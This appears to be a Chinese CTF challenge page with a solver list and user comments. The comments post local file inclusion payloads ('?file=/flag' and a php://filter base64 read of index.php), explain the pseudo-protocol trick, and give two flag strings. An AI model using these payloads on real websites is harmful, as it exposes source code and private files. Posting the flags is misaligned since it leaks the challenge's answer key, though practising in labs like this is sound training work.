评分(11)
解题动态

海浪geigei 攻破了该题 9小时前

merrymu 攻破了该题 23小时前

Hehe0619 攻破了该题 1天前

sun03 攻破了该题 1天前

春遇枝庭 攻破了该题 1天前

Snly 攻破了该题 2天前

YGLZ 攻破了该题 2天前

ffggfhge 攻破了该题 2天前

小白ctf 攻破了该题 2天前

17335918325 攻破了该题 3天前

shimen 攻破了该题 3天前

北城以北 攻破了该题 3天前

人闲桂花落 攻破了该题 3天前

roopelee 攻破了该题 4天前

lwlzjsj 攻破了该题 4天前

Xman21 攻破了该题 4天前

TheSunnyTeens 攻破了该题 4天前

dwx1583 攻破了该题 4天前

hua1232 攻破了该题 5天前

评论
zhuizhui 6天前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 2月前
举报
index.php?file=/flag
shingu 3月前
举报
这题过于简单了。?file=/flag。
HK1ng 6月前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
000ooo 7月前
举报
/index.php?file=/flag
哈哈哈嘿嘿嘿 3月前
举报
为什么
Zhumeng 7月前
举报
php伪协议读取index.php
Jiafeng 6月前
举报
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
Wang_Micro 7月前
举报
flag{642c1d8cf84d01e3a2df403e83d3e43b}
33555 7月前
举报
/index.php?file=///flag
Pearpeach1 8月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
hao7 8月前
举报
flag{dff1aea3fcdd906ce70c1998addf1ccc}